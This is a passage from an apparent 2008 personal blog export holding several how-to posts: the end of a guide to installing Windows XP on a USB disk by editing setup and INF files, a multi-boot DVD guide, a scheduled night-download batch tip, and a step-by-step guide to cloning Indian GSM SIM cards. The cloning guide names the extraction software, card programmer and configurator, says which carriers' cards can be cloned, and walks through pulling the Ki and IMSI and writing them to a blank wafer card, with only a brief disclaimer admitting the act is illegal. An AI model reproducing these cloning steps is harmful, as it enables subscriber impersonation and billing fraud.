/>usbuhci = "Universeller Hostcontroller",files.usbuhci,usbuhci<br />usbhub = "Standard-USB-Hubtreiber",files.usbhub,usbhub<br />hidusb = "HID-Parser",files.hidusb,hidusb<br />serial = "Treiber f�r seriellen Anschluss",files.none,serial<br />serenum = "Enumerator f�r seriellen Anschluss",files.none,serenum<br />usbstor = "USB-Speicherklassentreiber",files.usbstor,usbstor<br />usbccgp = "USB Generic Parent Driver",files.usbccgp,usbccgp<br />Next, we also have to write several keys into the registry. Convieniently, the txtsetup.sif allows you to specify files that are<br />parsed and instered into the registry at install time. Insert the following in the [HiveInfs.Fresh] section:<br />[HiveInfs.Fresh]<br />AddReg = hivedef.inf,AddReg<br />AddReg = hivesys.inf,AddReg<br />AddReg = hivesft.inf,AddReg<br />AddReg = hivecls.inf,AddReg<br />AddReg = hiveusd.inf,AddReg<br />AddReg = dmreg.inf,DM.AddReg<br />AddReg = usbboot.inf,usbservices<br />and also in [SourceDisksFiles]<br />[SourceDisksFiles]<br />usbboot.inf = 1,,,,,,_x,3,,3<br />bootvid.dll = 1,,,,,,3_,2,0,0,,1,2<br />kdcom.dll = 1,,,,,,3_,2,0,0,,1,2<br />Finally, save and close TXTSETUP.SIF. We are done with it.<br />6-B) DOSNET.INF<br />Now, open DOSNET.INF , and change the second [Files] section to look like this:<br />[Files]<br />d1,usbboot.inf<br />d1,_default.pif<br />d1,12520437.cpx<br />d1,12520850.cpx<br />6-C) usb.inf<br />Change the bolded lines in the [StandardHub.AddService] and [CommonClassParent.AddService] sections:<br />[StandardHub.AddService]<br />DisplayName = %StandardHub.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbhub.sys<br />LoadOrderGroup = Boot Bus Extender<br />[CommonClassParent.AddService]<br />DisplayName = %GenericParent.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbccgp.sys<br />LoadOrderGroup = Boot Bus Extender<br />6-D) usbport.inf<br />Change the bolded lines in the [EHCI.AddService], [OHCI.AddService] , [UHCI.AddService] and [ROOTHUB.AddService]<br />sections:<br />[EHCI.AddService]<br />DisplayName = %EHCIMP.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbehci.sys<br />LoadOrderGroup = Boot Bus Extender<br />[OHCI.AddService]<br />DisplayName = %OHCIMP.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbohci.sys<br />LoadOrderGroup = Boot Bus Extender<br />[UHCI.AddService]<br />DisplayName = %UHCIMP.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbuhci.sys<br />LoadOrderGroup = Boot Bus Extender<br />[ROOTHUB.AddService]<br />DisplayName = %ROOTHUB.SvcDesc%<br />ServiceType = 1 ; SERVICE_KERNEL_DRIVER<br />StartType = 0 ; SERVICE_DEMAND_START<br />ErrorControl = 1 ; SERVICE_ERROR_NORMAL<br />ServiceBinary = %12%\usbhub.sys<br />LoadOrderGroup = Boot Bus Extender<br />6-E) usbstor.inf<br />Change / Add the bolded lines in the [USBSTOR.AddService] section<br />[USBSTOR.AddService]<br />DisplayName = %USBSTOR.SvcDesc%<br />ServiceType = 1<br />StartType = 0<br />Tag = 3<br />ErrorControl = 1<br />ServiceBinary = %12%\USBSTOR.SYS<br />LoadOrderGroup = Boot Bus Extender<br />6-F) new file: USBBOOT.INF<br />Create a new file called USBBOOT.INF in the same directory as your other changed files, and put the following content into<br />it:<br />[usbservices]<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","DisplayName",0x00000000,"USB Mass Storage Driver"<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","ErrorControl",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","Group",0x00000000,"System Reserved"<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","ImagePath",0x00020000,"system32\DRIVERS\USBSTOR.SYS"<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","Start",0x00010001,0<br />HKLM,"SYSTEM\CurrentControlSet\Services\USBSTOR","Type",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","DisplayName",0x00000000,"USB 2.0 Enhanced Host Controller<br />Miniport Driver"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","ErrorControl",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","Group",0x00000000,"System Reserved"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","ImagePath",0x00020000,"system32\DRIVERS\usbehci.sys"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","Start",0x00010001,0<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbehci","Type",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","DisplayName",0x00000000,"USB2 Enabled Hub"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","ErrorControl",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","Group",0x00000000,"System Reserved"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","ImagePath",0x00020000,"system32\DRIVERS\usbhub.sys"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","Start",0x00010001,0<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbhub","Type",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","DisplayName",0x00000000,"Microsoft USB Universal Host<br />Controller Miniport Driver"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","ErrorControl",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","Group",0x00000000,"System Reserved"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","ImagePath",0x00020000,"system32\DRIVERS\usbuhci.sys"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","Start",0x00010001,0<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbuhci","Type",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","DisplayName",0x00000000,"Microsoft USB Open Host Controller<br />Miniport Driver"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","ErrorControl",0x00010001,1<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","Group",0x00000000,"System Reserved"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","ImagePath",0x00020000,"system32\DRIVERS\usbohci.sys"<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","Start",0x00010001,0<br />HKLM,"SYSTEM\CurrentControlSet\Services\usbohci","Type",0x00010001,1<br />7) Repack the inf files into their original IN_ format<br />If you have not already deleted your extracted .IN_ files, do so now. They need to be replaced. Open a DOS shell again, and navigate to<br />the folder with your changed files. Then exceute the following commands:<br />cabarc n USB.IN_ usb.inf<br />cabarc n USBPORT.IN_ usbport.inf<br />cabarc n USBSTOR.IN_ usbstor.inf<br />The three IN_ files should now exist again.<br />Congratulations. All out modifications are done.<br />8) Inject the changed files into the ISO<br />Open your Windows CD image again with WinISO. Navigate to the I386 folder, and delete the following files from the ISO, saving the<br />changes to the ISO afterwards:<br />DOSNET.INF<br />TXTSETUP.SIF<br />USB.IN_<br />USBPORT.IN_<br />USBSTOR.IN_<br />Just to be sure all is updated in the ISO, cloase and repoen the ISO in WinISO. Now, again go to the I386 folder and select "Add Files".<br />Now add your changed files, in detail:<br />USBBOOT.INF<br />DOSNET.INF<br />TXTSETUP.SIF<br />USB.IN_<br />USBPORT.IN_<br />USBSTOR.IN_<br />Save the ISO. You are done.<br />9) Burn the ISO back to CD<br />Feel free to use any burning package you want. I used the free and simple Burnatonce<br />10) Install Windows XP from the CD<br />Shut down your computer. Disconnect ANY internal and external hard drives (so Windows cannot find them during installation and mess<br />up their Master Boot Records hehe). Some computers will have trouble to boot without an internal HDD attached, check in your BIOS<br />and, if possible, remove the HDD from the boot sequence and set the USB Harddisk as the first boot device, and the CDROM as second.<br />Also, now connect your USB Harddrive directly to the computer, without any Hubs in between.<br />Windows should install just fine, with the exceptions noted below.<br />Issues you will encounter during installation:<br />During driver installation, the USB drivers will prompt you, as they are "not certified" - This is normal. Our changes invalidated<br />the checksum, and therefore the driver is no longer signed. Just press "yes" a couple of times.<br />Upon completion of the install, the system will complain once on the first bootup that the pagefile does not exist. You can ignore<br />this for now, as Windows will work fine without it. People are looking at fixing this issue, but its not critical for now.<br />Once everything is up and running , shut down and reconnect all your drives.<br /><br />Mainak Bhattacharya<br /><a href="http://www.makdee.co.cc">www.makdee.co.cc</a><br />m4mainak@gmail.comMak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-18170704540025818212008-12-17T05:37:00.009+05:302008-12-17T06:19:57.548+05:30EASIEST WAY TO CLONE SIM CARDSThe following guide enables us to make clones of sims used in India. Unlike the complicated guides you find on the Internet I have compiled them all together and made one simple guide which can be followed even by beginners. Covering only the relevant things needed to know rather than going technically deep.<br /><br /><br /><br /><span style="font-weight: bold; color: rgb(255, 0, 0);">Before i start off with this guide I would like to make one thing </span><span style="font-weight: bold; color: rgb(255, 0, 0);">clear. SIM CLONING is completely illegal. There have been many </span><span style="font-weight: bold; color: rgb(255, 0, 0);">cases in india where people have been caught. for cloning other's </span><span style="font-weight: bold; color: rgb(255, 0, 0);">SIM CARDS, and making calls worth thousands through it. Recently many GSM operators in INDIA have set up surveillance techniques to trap people who use cloned SIM'S. </span><span style="font-weight: bold; color: rgb(255, 0, 0);">So I once again request to everyone that please use this guide for personal purpose only, do not use this guide for cheating. </span><br /><br /><br /><br /><span style="font-weight: bold;">First off a little introduction about SIM CARDS:</span><br /><br /><br /><br />Our sim cards contains two secret codes or keys called (imsi value and ki value) which enables the operator in identifying the sim card number and authenticate the customer, these codes are<br />related to our mobile numbers which the operators store in their vast data base. It is based on these secret keys that enables the billing to be made to that customer. Now what we do in sim cloning is extract these two secret codes from the sim and programme it into a new blank smart card often known as wafer. Since the operator authentication of SIM CARDS is based on these values, it enables us to fool the operators in thinking that its the original sim. This authentication system is a big flaw concerning GSM technology.<br /><br /><br /><br /><span style="font-weight: bold;">Now which sim cards can be cloned:</span><br /><br /><br /><br />Sim cards are manufactured on the basis of 3 algorithms: COMP128v1,COMP128v2 and COMP128v3.<br /><br /><span style="font-weight: bold;">NB: Currently only COMP128v1 version SIM CARDs can be </span><br /><span style="font-weight: bold;">cloned; since this is the only algorithm which has been cracked by users.</span><br /><br />Bear in mind that 70% of all the SIM cards we use are COMP128v1. They are as follows:<br /><br />Airtel-90% can be cloned;<br />Hutch-75% can be cloned;<br />bpl mobile-90% can be cloned;<br />idea-numbers before Aug 2005 can be cloned newer cards very rare;<br />BSNL- 0% say no - reason not comp128v1 version;<br /><br />OK thats it about the background.; Now lets get to the Main Part--><br /><br /><br /><span style="font-weight: bold;">ITEMS NEEDED</span>:<br /><br /><br />a) Sim card Reader (phoenix or smartmouse reader)<br /><br />b) Plain or Blank silver wafer card or smart card<br /><br />c) Software to Extract Ki and imsi (Woron scan 1.09 is the best)<br /><br />d) Wafer Card Programmer (is a hardware chipset needed to programme smart card Millenium 2000VX MAX)<br /><br />e) Software to make the PIC and EEPROM files (Sim Emu 1.06 configurator by pic-ador)<br /><br />f) Software to write the PIC and EEPROM files to blank card (card master 2.1)<br /><br /><br /><span style="font-weight: bold;">GETTING STARTED:</span><br /><br />a)<span style="font-style: italic;">Extracting the Ki and IMSI:</span><br /><br />First connect the SIM card reader to the PC's com port insert your original sim card. Run "woron scan 1.06". click on the menu "card reader" and click settings and select the com port which the card reader is connected to. Dont change any thing else in settings. Click OK.<br /><br />If you have a phoenix card reader checkmark pheonix in the card reader menu.<br /><br />Now click on "IMSI select" on the task menu. The program will now communicate with the sim card and retrieve the imsi value. Once you got the imsi value, write that on a piece of paper.<br /><br />now in the same way retrieve the "icc value" and write that down too.<br /><br />now click on "Ki search" now the program hacks the sim and retrieves the the ki value which consists of 32 numbers. Note that it may take up to 8 hrs to completely get the ki value....... no matter how much faster the comp is. This is because the SIM CARD is only capable<br />of receiving and sending data @9600 bits/sec...<br /><br /><span style="font-weight: bold;">So go to sleep for now.</span><br /><br />After u wake up make sure u write down the Ki value safely in a piece of paper like u did for the imsi value. Exit woron scan.<br /><br />yaaahhoooo now you can stand up and proudly say that u hacked YOUR FIRST SIM CARD.<br /><br />b)<span style="font-style: italic;">Making the PIC and EEPROM files with SIM EMU configurator</span>:<br /><br />First uncheck the A3A8 checkbox under security. <span style="font-weight: bold;"><br />N.B: Please dont enable this even from the sim services menu. If enabled, it countsback </span><span style="font-weight: bold;">to zero and when it reaches zero, it will corrupt your simcard. </span><br /><br />In the configurator you can set the number of ADN, FDN and SMS. You can use the formulae: ?16448 = (ADN - 51 ) x 32 +SMS x 176 + FDN x 32 must be less than 6480. for silver wafer cards.<br /><br />Then generate the Hex files forPIC and EEPROM by clicking the Generate<br />Hex file. With this configurator, in addition to the 16 number slots, you can make the simcard a Motorola Test card too. In 16 in 1 configurator the positions are from 0-9 and from A-F. Each position can be customised by induvidual PIN an PUK codes. finished making the files now next step copy these files to the blank card using the programmer.<br /><br />c)<span style="font-style: italic;">Write the files to the SILVER WAFER card: </span><br /><br />Now we have the files to be written to the Silver Wafer card. For this we need the Wafer card programmer and the software for programming. Here i am using the Millenium 2000VX Max programmer and the Cardmaster 2.1 software. Connect the programmer and run the software. Select the type of card you are using. Select the port by clicking setup > port. If the port set by you is correct the red colour with message on status bar changes to yellow and shows no SIM CARD. Insert the SIM CARD and load the files for PIC and EEPROM in the file to PIC and file to EEPROM fields respectively. Dont change any other settings. Now you are at the last stage.<br /><br />Press F3 or click edit > Auto Program. You can watch the status bar about what is happening. Programming the pic, Programming the eeprom, programming the pic, Verifying, and atlast you will get the message that the card is programmed succesfully. Here you may ask the question why the PIC is programmed again after programming the EEPROM? The PIC is first programmed with the eeprom loader to program the EEPROM. then the EEPROM is programmed through the pic. After that the contents in the pic is erased and the actual file is programmed in the PIC.<br /><br />d) <span style="font-style: italic;">Cutting the smart card into a Sim card and settings on the phone: </span><br /><br />The card which we have made is a 16 in 1 sim card; means we can store 16 different SIM card numbers in one. This is the last step guys. Cut the smart card in the shape of your SIM card. Insert the SIM card in the phone.<br /><br />Switch on the handset. The phone asks for the PIN. Type any 4 digit number this is for the first slot 0. now the phone asks for the PUK code again type any 8 digit number again for the first<br />slot. Now the phone switches on with no network coverage. A network error message will appear. This is usual because the main values (ki and imsi) have not entered. So the network operator cannot authenticate the sim.<br /><br />now the Finally you would have noticed by now that a new menu called the "sim emu 6.01" has appeared. Select it you can see the menus Configure, Select Phone and Information. Select Configure and go to config postion. It asks for the position. You can select any<br />position from 0-9 and A-F. After selecting the position it asks for a PIN and PUK. Always provide different PIN and PUK for each positions. It helps us to switch to a number directly when the handset is switched on. After PIN and PUK it asks for KI,IMSI and ICCID. You can now recall the extracted values from STEP1 and enter it to appropriate fileds.<br /><br /><br /><span style="font-weight: bold; color: rgb(255, 0, 0);">After doing all this you should now posses your newly cloned SIM card. you earned it congratulations. If not then. you must beat yourself 10 times. and repeat the entire process.</span>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-6020395438612899902008-11-13T21:09:00.000+05:302008-11-13T21:10:57.753+05:30!!!!!!!!!...........OWN MULTI BOOT DVD...........!!!!!!!!!<h3 class="post-title entry-title"> <a href="http://javascriptlovers.blogspot.com/2008/01/multi-boot-dvd.html"><br /></a> </h3> Here's how you can make your own multi-OS installer DVD—completely<br />legal, and no piracy involved (as long as you don't go distributing<br />these DVDs, of course)!<br />What you need:<br />1. Magic ISO Maker, a powerful CD/DVD image file creating, editing and<br />extracting tool. It handles both CD and DVD image files, converts BIN<br />to ISO and back, makes an ISO file from a DVD/CD-ROM or hard disk, and<br />handles boot information. MagicISO can also make multiple boot CD/DVD<br />image files. It is available from <a href="http://www.magiciso.com/" target="_blank">www.magiciso.com</a>, is a 2.6 MB<br />download, and costs $29.95<br />(Rs 1,400).<br />2. A DVD writer and a few blank DVDs.<br />3. Your original operating system CDs.<br />We shall take, as an example, a multi-boot DVD with your copies of<br />Windows XP Professional and Windows 98.<br /><br /><br />The magicISO interface<br /><br />Collect the bootable images from installation CD<br /><br /><br />Make an ISO from a CD-ROM<br /><br />Create a folder "boot" on the C drive. Insert one of the operating<br />system's installation CD into the DVD drive. Click the "Make CD/DVD<br />image file from CD/DVD-ROM" button to open the "Make ISO from CD-ROM"<br />dialog. Choose CD-ROM, and select an appropriate output file name like<br />bootxp.bif with the path to save set to C:Boot, and choose "Export<br />Boot Image". Repeat this for Windows 98 and call its boot image<br />boot98.bif.<br /><br />Make the multiple OS DVD compilation<br />In MagicISO, click the "Create new image file" button on the toolbar.<br />Click the folder-shaped button to create the "WinXP" folder in the<br />root directory. Insert the Windows XP Professional CD and copy all its<br />contents into this folder. Click the Save button to save the<br />compilation as C:multiboot.iso. Eject the CD and insert the CD of the<br />next operating system into the drive. Create a folder with an<br />appropriate name and repeat the above procedure.<br />Open C:multiboot.iso with MagicISO. Hold down [Ctrl], and use the<br />mouse to drag the "WinXPi386" folder to the root directory.<br />Right-click on "i386" to rename it to "iWXP". Repeat the steps for<br />Windows 98, calling it iW98, for instance.<br />Copy the files "WinXPWIN51", "WinXPWIN51IP" and "WinXP WIN51IP.SP2" to<br />the root directory. Now create a folder called "iWXP" in "c:boot".<br />Extract the "iWXPSETUPLDR.BIN" file to "c:bootiWXP":<br />1. Select the iWXPSETUPLDR.BIN file.<br />2. Click the button to extract the file to "c:bootiWXP".<br />Open "c:bootiWXPSETUPLDR.BIN" with a Hex Editor—UltraEdit is a good example.<br />Replace all instances of "I386" with "IWXP" (Use upper-case letters).<br />Copy c:bootiWXPSETUPLDR.BIN back to "iWXPSETUPLDR .BIN" in the<br />multiboot.iso that you have open.<br />From the open multiboot.iso, extract "iWXPTXTSETUP.SIF" file to "c:bootiWXP":<br />1. Select the "iWXPTXTSETUP.SIF" file.<br />2. Click on the Extract button to extract the file to "c:bootiWXP".<br />Open "c:bootiWXPTXTSETUP.SIF" with Notepad. Replace all instances of<br />"I386" within the section "[SourceDisksNames.x86]" with "IWXP"<br />Copy "c:bootiWXPTXTSETUP.SIF" back to "iWXPTXTSETUP.SIF" within c:multiboot.iso.<br />Now insert the Windows 98 CD and drag the Win98 folder to the root.<br /><br />Make the multi-boot DVD image file<br />Click on the "Make multi-boot CD/DVD image file" button to open the<br />Multi-Boot Image Editor. Click "Add..." to add an item to multi-boot<br />image file. The Bootable Wizard will open and guide you. Choose "Boot<br />from bootable image file" and click Next to go to the next step.<br />Choose the "From Local Computer" option, input "C:boot bootxp.bif",<br />and click Next to go to the next step. Input the menu description of<br />Window XP, and set "Hot Key" to "1". Click Finish to complete the<br />Windows XP bootable item.<br /><br /><br />The bootable Wizard for the first OS<br /><br />Now click again on "Add…" to add one more boot item. Repeat this for<br />the Windows 98 bootable image file.<br />Now, in the Multi-Boot Image Editor, select an item that you wish to<br />make the default boot option and click on "Set Default". Click on the<br />Save button to save the multi-boot image file to<br />c:bootmultiboot_boot.mbi.<br /><br />Finalising and burning the DVD<br />Open C:multboot.iso again. Click on "Load boot image ..." to open the<br />"Bootable Option" dialog. Choose "From multi-bootable image file" and<br />select "c:boot multiboot_ boot.mbi". Save the ISO. Now go ahead and<br />burn the DVD!<br /><br />Burn the multi-boot DVDMak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-82694018587211815232008-11-08T07:47:00.002+05:302008-11-08T07:52:43.260+05:30HOW 2 DOWNLOAD DURING NIGHTs<span style="font-family: verdana;">Hi people,</span><br /><br /><span style="font-family: verdana;">Here's another way to download without u having to get up at 2 am to switch off/on your router.( Shajul's software dataonemanager is the other one)</span><br /><br /><span style="font-family: verdana;">However that s/w has a few shortcomings. (the code not being open source is chief among them ), so i figured there could be a better way to do the same thing.</span><br /><br /><span style="font-family: verdana;">so this is how to do it:</span><br /><br /><span style="font-family: verdana;">1. If your router is a router, i.e. it is the one that authenticates your access to your ISP's network, then you would have to change it to a bridge router.</span><br /><span style="font-family: verdana;">Hey no worries, folks! no need to go out and buy a new one. Looks like your existing modem can be converted into one:</span><br /><br /><span style="font-family: verdana;">Here's how you do it:</span><br /><span style="font-family: verdana;">(Disclaimer: I have only a Nokia Siemens C2110 router with me. So I can show you how to configure a bridged router for that model only. Most probably other routers wouldn't differ too much from this.)</span><br /><br /><span style="font-family: verdana;">1. Connect to your router page (usually) at 192.168.1.1. Login to it. Chances are your username/password would still be admin/admin.</span><br /><span style="font-family: verdana;">Click on Configuration -> Internet Connection on the left pane. This is the page you would get:</span><br /><br /><br /><span style="font-family: verdana;">huh! you might be wondering the last line in your page differs from what you see in the image. Yours would be saying something like "PPoE_0_35" under the PVC Name column. Relax! this is the configuration we are going to have when we finish reconfiguring your modem.</span><br /><br /><span style="font-family: verdana;">2. Click on the edit button (the icon with a pencil image). Click "Next" on the page you get.</span><br /><br /><span style="font-family: verdana;">3.In the second page, click on "Bridging". Click "Next".</span><br /><br /><span style="font-family: verdana;">3. Click "Next" for the third page too.</span><br /><br /><span style="font-family: verdana;">4. Finally click "Apply" on the last page. Close the browser window.</span><br /><br /><span style="font-family: verdana;">Thats all you set, well.....almost!</span><br /><br /><span style="font-family: verdana;">Now go to Control Panel ->Network Connections -> Click on File-> New Connection....</span><br /><br /><br /><span style="font-family: verdana;">4. Now select "Connect to the internet". Then select "Set up my connection manually", then, "Connect using a broadband modem that requires a user name and password". Type in any name you want to call your connection. Then type in the user name and password for accessing your broadband connection.</span><br /><br /><span style="font-family: verdana;">Make sure your computer connects to the internet using the above settings. Test it by clicking on the connection you just created and then clicking "Connect".</span><br /><br /><span style="font-family: verdana;">If your connection works then the hard part is (almost!) over.</span><br /><br /><span style="font-family: verdana;">What we are now going to do is create two batch files...( those .bat files you see occasionally).</span><br /><br /><span style="font-family: verdana;">1.First open Notepad.Then type in the following line:</span><br /><br /><span style="font-family: verdana;">rasdial "</span><name style="font-family: verdana;" you="" gave="" to="" your="" internet="" connection="">" "user name" "password"<br /><br />Save the file as Connect.bat .i.e change the file type to bat.<br /><br />2. Now open Notepad again and type the following:<br /><br />rasdial /disconnect<br /><br />Save the file as Disconnect.bat.<br /><br />ok. now open scheduled tasks. For Windows XP it is "Start->All Programs->Accessories->System Tasks->Scheduled Tasks"<br /><br />1. Click on Add scheduled task and click Next to start the wizard.<br /><br />2. Click on Browse. Select "Connect.bat".<br /><br />4. Now configure the task as how you want to connect to the Net. I selected "Daily,Start time: 2:08", Perform this task: Daily,"Start Date: <...>".<br /><br />5. Add another scheduled task this time for Disconnect.bat.<br />for 500C, 500C+ users, Start time : 2:08 for Connect.bat and 7:50 for Disconnect.bat is very safe. but sync ur computer clock with time.nist.gov to be doubly sure.<br /><br />6. Add as many scheduled tasks for your torrent clients or download managers with Start time after that of Connect.bat.<br /><br />THATS ALL..<br /><br />If u plan to leave your computer on during the night, this is okay.<br /><br />however for scrimpers and misers like me, i plan to have my computer switching on just before the connecting time. Seems there's a way in ur BIOS to do dat too. there's smething called a wake up on alarm and a couple of options after that, prob'bly in the Power Configuration menu. Just look around in your mobo manual, it isnt hard.<br /><br />This method has a number of advantages....:<br />1. no fixed IP.<br />2. the time to connect can be as u please. so its flexible.<br />3. everything's transparent and simple.<br />4. the s/w didnt work for me.. yeah, i'm a dumbhead. it could be something i did or did not, so i found this little workaround.<br /><br /><br />So thats probably it. Please feel free to reply if u get into any problems. i'll be only too happy to help.<br /><br />ok, i think this method has been suggested by someone a long time back. my apologies to him!<br /><br />If you pleased reading this topic please visit: <a href="http://www.makdee.co.cc/">www.makdee.co.cc</a></name>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-41732085867613652812008-09-24T10:34:00.000+05:302008-09-24T10:35:58.161+05:30PEER 2 PEER CONNECTION IN WINDOWS 98SE<meta equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 11"><meta name="Originator" content="Microsoft Word 11"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CMainak%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"><link rel="Edit-Time-Data" href="file:///C:%5CDOCUME%7E1%5CMainak%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_editdata.mso"><!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--><o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"></o:smarttagtype><o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="country-region"></o:smarttagtype><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles> </xml><![endif]--><!--[if !mso]><object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"></object> <style> st1\:*{behavior:url(#ieooui) } </style> <![endif]--><style> <!-- /* Font Definitions */ @font-face {font-family:Wingdings; panose-1:5 0 0 0 0 0 0 0 0 0; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:536871559 0 0 0 415 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman";} h2 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:2; font-size:18.0pt; font-family:"Times New Roman"; font-weight:bold;} h3 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:3; font-size:13.0pt; font-family:Arial; font-weight:bold;} h4 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:4; font-size:14.0pt; font-family:"Times New Roman"; font-weight:bold;} a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;} p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman";} @page Section1 {size:595.45pt 841.7pt; margin:.5in .5in 49.7pt .5in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} /* List Definitions */ @list l0 {mso-list-id:233518406; mso-list-template-ids:157440284;} @list l0:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l1 {mso-list-id:552816732; mso-list-template-ids:1487538804;} @list l1:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l2 {mso-list-id:596063250; mso-list-template-ids:-1931713122;} @list l2:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l3 {mso-list-id:690227275; mso-list-template-ids:-1851863192;} @list l3:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l4 {mso-list-id:851727480; mso-list-template-ids:-1630765782;} @list l4:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; 